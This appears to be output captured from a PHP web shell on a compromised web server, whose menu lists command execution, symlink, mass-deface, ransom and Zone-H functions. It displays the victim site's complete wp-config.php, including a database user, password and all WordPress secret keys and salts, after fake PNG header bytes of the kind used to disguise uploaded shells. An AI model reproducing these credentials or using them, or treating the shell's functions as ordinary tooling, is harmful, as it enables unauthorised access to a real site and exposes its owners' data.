\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/www.netippbx.net-old/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/www.netippbx.net-old/wp-config.php |
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL ayarlar? - Bu bilgileri sunucunuzdan alabilirsiniz ** //
/** WordPress i?in kullan?lacak veritaban?n?n ad? */
define('DB_NAME', 'netippbxdb');
/** MySQL veritaban? kullan?c?s? */
define('DB_USER', 'obnetip');
/** MySQL veritaban? parolas? */
define('DB_PASSWORD', '$2IyzO1jJ8');
/** MySQL sunucusu */
define('DB_HOST', 'localhost');
/** Yarat?lacak tablolar i?in veritaban? karakter seti. */
define('DB_CHARSET', 'utf8');
/** Veritaban? kar??la?t?rma tipi. Herhangi bir ??pheniz varsa bu de?eri de?i?tirmeyin. */
define('DB_COLLATE', '');
/**#@+
* E?siz do?rulama anahtarlar?.
*
* Her anahtar farkl? bir karakter k?mesi olmal?!
* {@link http://api.wordpress.org/secret-key/1.1/salt WordPress.org secret-key service} servisini kullanarak yaratabilirsiniz.
* ?erezleri ge?ersiz k?lmak i?in istedi?iniz zaman bu de?erleri de?i?tirebilirsiniz. Bu t?m kullan?c?lar?n tekrar giri? yapmas?n? gerektirecektir.
*
* @since 2.6.0
*/
define('AUTH_KEY', '&(RFGOpe-61a}e]%^lc.[Y3,`t||M@!RU-e&7md/gO&1+?d,Aizi*#+.(b2,]Z5f');
define('SECURE_AUTH_KEY', 'BP$:AS7 T({}R^9-.Kr07xa6mUX7;$]vZ-,wWM3nY-:#VaK5a+g+y,Da/zqJjRNk');
define('LOGGED_IN_KEY', '30:pecM:v:lg6zrKX0z(Mt;<j_/Am,h+qSob`.5mmMhO[-0|?!<EJ44obVZy;N%Q');
define('NONCE_KEY', 'o*hQmMf5Gm;wMXLZu|qa0_~qQ+r,HTjq y~4G$k!h =7Hk@(Y?;bnYv|0,^>D)N5');
define('AUTH_SALT', ' ,2^s9*YZOa7j:Bj$mR[3-4:<{jh:<ey|]< @UvY_F{b_r6a<2q;#)s7Is<{(gG+');
define('SECURE_AUTH_SALT', 'Ap4G_`wSa%_Y;vtc%(FB:&+v_Nao-!ac^>j;#S@*X( e28qV.J!&&yWhT4RmTLRz');
define('LOGGED_IN_SALT', 'H+?Nq`+QYRwqQV_&S?Tj5(#ne+euDH+A}gw76DJ+%,g$Ob!0r&EzrK|aps;Y${|6');
define('NONCE_SALT', 'YdQRXyFc-adK|`?:+|S2dI:7nZJc*Y.g]@ZgXE/^@QB#kKzh=%A]i+ty2ea<$n,R');
/**#@-*/
/**
* WordPress veritaban? tablo ?n eki.
*
* T?m kurulumlara ayr? bir ?nek vererek bir veritaban?na birden fazla kurulum yapabilirsiniz.
* Sadece rakamlar, harfler ve alt ?izgi l?tfen.
*/
$table_prefix = 'wp_';
/**
* WordPress yerel dil dosyas?, varsay?lan ingilizce.
*
* Bu de?eri de?i?tirmenize gerek yok! Zaten T?rk?e'ye ayarl?.
* tr_TR.mo T?rk?e dil dosyas?n?n wp-content/languages dizini alt?nda oldu?undan emin olun.
* T?rk?e ?eviri hakk?nda ?neri ve ele?tirilerinizi iletisim@wordpress-tr.com adresine iletebilirsiniz.
*
*/
define('WPLANG', 'tr_TR');
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* Hepsi bu kadar. Mutlu bloglamalar! */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');